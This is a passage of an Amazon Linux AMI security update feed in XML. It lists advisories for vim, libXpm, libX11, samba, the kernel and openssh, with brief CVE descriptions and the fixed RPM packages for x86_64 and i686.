release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1893</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1893: medium priority package update for vim</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5535:
Use After Free in GitHub repository vim/vim prior to v9.0.2010.
CVE-2023-5441:
NULL Pointer Dereference in GitHub repository vim/vim prior to 20d161ace307e28690229b68584f2d84556f8960.
CVE-2023-5344:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1969.
CVE-2023-46246:
Vim is an improved version of the good old UNIX editor Vi. Heap-use-after-free in memory allocated in the function `ga_grow_inner` in in the file `src/alloc.c` at line 748, which is freed in the file `src/ex_docmd.c` in the function `do_cmdline` at line 1010 and then used again in `src/cmdhist.c` at line 759. When using the `:history` command, it's possible that the provided argument overflows the accepted value. Causing an Integer Overflow and potentially later an use-after-free. This vulnerability has been patched in version 9.0.2068.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46246" title="" id="CVE-2023-46246" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5344" title="" id="CVE-2023-5344" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5441" title="" id="CVE-2023-5441" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5535" title="" id="CVE-2023-5535" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-filesystem" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1712-1.84.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1712-1.84.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1712-1.84.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1712-1.84.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1712-1.84.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1712-1.84.amzn1.x86_64.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="x86_64"><filename>Packages/xxd-9.0.1712-1.84.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1712-1.84.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1712-1.84.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1712-1.84.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1712-1.84.amzn1.i686.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="i686"><filename>Packages/xxd-9.0.1712-1.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1894</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1894: medium priority package update for libXpm</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-43788:
libXpm: out of bounds read in XpmCreateXpmImageFromBuffer()
NOTE: https://www.openwall.com/lists/oss-security/2023/10/03/1
NOTE: Fixed by: https://gitlab.freedesktop.org/xorg/lib/libxpm/-/commit/2fa554b01ef6079a9b35df9332bdc4f139ed67e0
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43788" title="" id="CVE-2023-43788" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXpm-debuginfo" version="3.5.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-debuginfo-3.5.10-2.13.amzn1.x86_64.rpm</filename></package><package name="libXpm" version="3.5.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-3.5.10-2.13.amzn1.x86_64.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-devel-3.5.10-2.13.amzn1.x86_64.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-devel-3.5.10-2.13.amzn1.i686.rpm</filename></package><package name="libXpm-debuginfo" version="3.5.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-debuginfo-3.5.10-2.13.amzn1.i686.rpm</filename></package><package name="libXpm" version="3.5.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-3.5.10-2.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1895</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1895: medium priority package update for libX11</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-43786:
A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43786" title="" id="CVE-2023-43786" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11-devel" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.17.amzn1.x86_64.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.17.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.17.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.17.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.17.amzn1.i686.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.17.amzn1.i686.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.17.amzn1.i686.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1896</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1896: medium priority package update for samba</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4091:
SMB client can truncate files to 0 bytes by opening files with OVERWRITE disposition when using the acl_xattr Samba VFS module with the smb.conf setting "acl_xattr:ignore system acls = yes"
CVE-2022-2127:
When doing NTLM authentication, the client sends replies to
cryptographic challenges back to the server. These replies
have variable length. Winbind did not properly bounds-check
the lan manager response length, which despite the lan
manager version no longer being used is still part of the
protocol.
If the system is running Samba's ntlm_auth as authentication backend
for services like Squid (or a very unusual configuration with
FreeRADIUS), the vulnarebility is remotely exploitable
If not so configured, or to exploit this vulnerability locally, the
user must have access to the privileged winbindd UNIX domain
socket (a subdirectory with name 'winbindd_privileged' under "state
directory", as set in the smb.conf).
This access is normally only given so special system services like
Squid or FreeRADIUS, that use this feature.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2127" title="" id="CVE-2022-2127" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4091" title="" id="CVE-2023-4091" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-python-test" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="24.68.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-24.68.amzn1.noarch.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="24.68.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-24.68.amzn1.noarch.rpm</filename></package><package name="samba-python" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-24.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1897</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1897: medium priority package update for kernel</title><issued date="2023-11-29 23:18:00" /><updated date="2024-06-19 18:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-52845:
In the Linux kernel, the following vulnerability has been resolved:
tipc: Change nla_policy for bearer-related names to NLA_NUL_STRING
CVE-2023-3567:
A use-after-free flaw was found in vcs_read in drivers/tty/vt/vc_screen.c in vc_screen in the Linux Kernel. In this flaw an attacker with local user access may lead to a system crash or a leak of internal kernel information.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3567" title="" id="CVE-2023-3567" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52845" title="" id="CVE-2023-52845" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.330-176.540.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1898</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1898: medium priority package update for openssh</title><issued date="2023-12-18 09:20:00" /><updated date="2023-12-19 14:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-48795:
AWS is aware of CVE-2023-48795, also known as Terrapin, which is found in the SSH protocol and affects SSH channel integrity. A protocol extension has been introduced by OpenSSH which needs to be applied to both the client and the server in order to address this issue. We recommend customers update to the latest version of SSH.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48795" title="" id="CVE-2023-48795" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.81.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.81.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-22.81.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1899</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1899: important priority package update for kernel</title><issued date="2024-01-03 22:37:00" /><updated date="2024-07-03 21:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6932:
A use-after-free vulnerability in the Linux kernel's ipv4: igmp component can be exploited to achieve local privilege escalation.
A race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread.
We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.
CVE-2023-52881:
In the Linux kernel, the following vulnerability has been resolved:
tcp: do not accept ACK of bytes we never sent
CVE-2023-52813:
In the Linux kernel, the following vulnerability has been resolved:
crypto: pcrypt - Fix hungtask for PADATA_RESET
CVE-2023-52340:
When a router encounters an IPv6 packet too big to transmit to the next-hop, it returns an ICMP6 "Packet Too Big" (PTB) message to the sender. The sender caches this updated Maximum Transmission Unit (MTU) so it knows not to exceed this value when subsequently routing to the same host.
In Linux kernels prior to 6.3, garbage collection is run on the IPv6 Destination Route Cache if the number of entries exceeds a threshold when adding the destination to the cache. This garbage collection examines every entry in the cache while holding a lock. In these affected kernel versions, a flood of the IPv6 ICMP6 PTB messages could cause high lock contention and increased CPU usage, leading to a Denial-of-Service.
The fix backports the garbage collection improvements from Linux kernel 6.3 by bringing the IPv6 code closer to the IPv4 code, which does not have this issue.
Patch: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=af6d10345ca76670c1b7c37799f0d5576ccef277
CVE-2023-0590:
A use-after-free flaw was found in qdisc_graft in net/sched/sch_api.c in the Linux Kernel due to a race problem. This flaw leads to a denial of service issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0590" title="" id="CVE-2023-0590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52340" title="" id="CVE-2023-52340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52813" title="" id="CVE-2023-52813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52881" title="" id="CVE-2023-52881" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6932" title="" id="CVE-2023-6932" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.334" release="177.552.amzn1" epoch="0" 